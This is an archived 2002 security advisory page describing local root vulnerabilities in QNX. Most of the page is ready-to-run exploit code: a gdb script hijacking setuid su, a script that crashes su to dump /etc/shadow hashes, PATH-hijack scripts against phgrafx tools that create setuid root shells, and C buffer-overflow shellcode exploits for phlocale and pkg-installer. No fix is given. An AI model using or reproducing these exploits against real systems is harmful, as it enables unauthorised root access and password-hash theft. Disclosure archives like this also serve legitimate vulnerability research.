Visit our newest sister site!
Hundreds of free aircraft flight manuals
Civilian • Historical • Military • Declassified • FREE!


TUCoPS :: Unix :: Various Flavours :: misc5394.htm

QNX buffer overflows and other goodies...



4th Jun 2002 [SBWID-5394]
COMMAND

	QNX buffer overflows and other goodies...

SYSTEMS AFFECTED

	Current QNX distribution

PROBLEM

	badc0ded@badc0ded.com found many bugs on QNX:
	

	 Issue 0x0 Kernel

	 ================

	

	QNX Allows local users to attach to  any  process.  Not  being  familiar
	with the QNX API and terminology, I can  only  describe  it  as  if  you
	could attach to ANY process with ptrace() regardless of  your  uid/euid.
	An example to clear things up :)
	

	

	$ cat tmp.c

	main ()

	{

	  printf(\"euid=%i\\n\",geteuid());

	}

	$ ls -l tmp

	-rwsr-xr-x  1 root      100            4021 May 20 13:31 tmp

	$ ./tmp

	euid=0

	So far everything is normal.

	$ gdb tmp

	GNU gdb 5.0

	Copyright 2000 Free Software Foundation, Inc.

	GDB is free software, covered by the GNU General Public License, and you are

	welcome to change it and/or distribute copies of it under certain conditions.

	Type \"show copying\" to see the conditions.

	There is absolutely no warranty for GDB.  Type \"show warranty\" for details.

	This GDB was configured as \"--host=x86-pc-nto-qnx --target=ntox86\"...

	(no debugging symbols found)...

	(gdb) r

	Starting program: /tmp/tmp

	(gdb) c

	Continuing.

	euid=0

	

	Program exited normally.

	(gdb)

	

	

	Uh oh.. not quite the result you would expect..
	

	Exploit:
	

	#!/bin/sh

	

	#include <std_shouts.h>

	#include <std_disclaimer.h>

	#http://www.badc0ded.com 

	

	echo \"#!/bin/sh\" > /tmp/runme

	echo cp /bin/sh /tmp/sh > /tmp/runme

	echo chmod 4755 /tmp/sh >> /tmp/runme

	chmod 755 /tmp/runme

	echo r root -c /tmp/runme > /tmp/badc0ded

	echo break *main+44 >> /tmp/badc0ded

	echo c >> /tmp/badc0ded

	echo \"call setuid(0)\" >> /tmp/badc0ded

	echo c >> /tmp/badc0ded

	gdb /bin/su  < badc0ded > /dev/null

	echo \"www.badc0ded.com\"

	sleep 1

	rm /tmp/runme /tmp/badc0ded

	/tmp/sh

	

	

	

	 Issue 0x1 /bin/su

	 ==================

	

	/bin/su accepts SIGSEGV and dumps world readable core.
	

	Exploit:
	

	#!/bin/sh

	#include <std_shouts.h>

	#include <std_disclaimer.h>

	# www.badc0ded.com <= we are in the .dot core, really :) 

	

	# If everything works you should get a \"copy\" of /etc/shadow 

	# in /tmp called mypasswd. 

	 

	su > /dev/null &

	kill -SEGV `ps -A | grep su | awk {\'print $1\'}`

	strings /var/dumps/su.core | grep \":0:0\" > /tmp/mypasswd

	

	

	

	 Issue 0x2 phgrafx

	 ==================

	

	phgrafx executes crttrap with system() without first dropping its euid.
	

	Exploit:
	

	#!/bin/sh

	#

	# click advanced,done, apply, accept and done. 

	# now you should have a setuid root shell waiting in /tmp/badc0ded

	#

	# www.badc0ded.com

	echo \"#!/bin/sh\" > /tmp/crttrap

	echo \"cp /bin/sh /tmp/badc0ded\" >> /tmp/crttrap

	echo \"chmod 4777 /tmp/badc0ded\" >> /tmp/crttrap

	echo \"/usr/bin/crttrap \\$1 \\$2 \\$3 \\$4 \\$5 \\$6 \\$7 \\$8 \\$9 \" >> /tmp/crttrap

	chmod 755 /tmp/crttrap

	export PATH=\"/tmp:$PATH\"

	/usr/photon/bin/phgrafx

	

	

	

	 Issue 0x3 phgrafx-startup

	 =========================

	

	Same problem as phgrafx
	

	Exploit:
	

	#!/bin/sh

	#

	# click test,restore,continue  

	# now you should have a setuid root shell waiting in /tmp/badc0ded

	#

	# www.badc0ded.com

	echo \"#!/bin/sh\" > /tmp/crttrap

	echo \"cp /bin/sh /tmp/badc0ded\" >> /tmp/crttrap

	echo \"chmod 4777 /tmp/badc0ded\" >> /tmp/crttrap

	echo \"/usr/bin/crttrap \\$1 \\$2 \\$3 \\$4 \\$5 \\$6 \\$7 \\$8 \\$9 \" >> /tmp/crttrap

	chmod 755 /tmp/crttrap

	export PATH=\"/tmp:$PATH\"

	/usr/photon/bin/phgrafx-startup

	

	

	

	 Issue 0x4 phlocale

	 ==================

	

	$ABLANG Buffer overflows and other goodies..
	

	Exploit:
	

	/* QNX phlocale $ABLANG exploit, gives you a cute euid=0 shell. 

	 * If it doesnt work for you, then you most likely need to change

	 * the address to system() and/or the ret.

	 * 

	 * www.badc0ded.com 

	*/

	

	main ()

	{ 

	   char s[]=\"\\xeb\\x0e\\x31\\xc0\\x5b\"

	            \"\\x88\\x43\\x2\\x53\\xbb\"

	            \"\\x80\\x95\\x04\\x08\"       //system() address

	            \"\\xff\\xd3\\xe8\\xed\\xff\"

	            \"\\xff\\xff\\x73\\x68\";

	   char payload[1000];

	   memset (payload,0x90,sizeof(payload));

	   sprintf(payload+971,\"%s%s\",s,\"\\x78\\x7b\\x04\\x08\");

	   setenv(\"ABLANG\",payload);

	   execlp(\"/usr/photon/bin/phlocale\",\"phlocale\",0);

	}

	

	

	

	 Issue 0x5 pkg-installer.c

	 =========================

	

	Simple cmdline buffer overflow in -u argument
	

	Exploit:
	

	/* Quick and dirty QNX pkg-installer root exploit.

	 * The shellcode sucks, it is longer than it has

	 * to be and you need the address to system() for 

	 * it to work. Yes I know I\'m lazy....

	 * 

	 * http://www.badc0ded.com 

	*/

	

	main(int argc, char **argv)

	{

	   int ret=0x804786d;

	   char *pret;

	   char s[]=\"\\xeb\\x0e\\x31\\xc0\\x5b\"

	            \"\\x88\\x43\\x2\\x53\\xbb\"

	            \"\\xe4\\xb4\\x04\\x08\"       //system() address

	            \"\\xff\\xd3\\xe8\\xed\\xff\"

		    \"\\xff\\xff\\x73\\x68\";

	   char payload[2000];

	   if (argc>=2)

	      ret=ret-atoi(argv[1]);

	   pret=&ret;

	   printf(\"using ret %x\\n\",ret);

	   memset(payload,0x90,1254);

	   sprintf(payload+1254,\"%s%s\",s,pret);

	   execlp(\"/usr/photon/bin/pkg-installer\",\"pkg-installer\",\"-u\",payload,0);

	

	}

	

SOLUTION

	Nothing yet.


TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH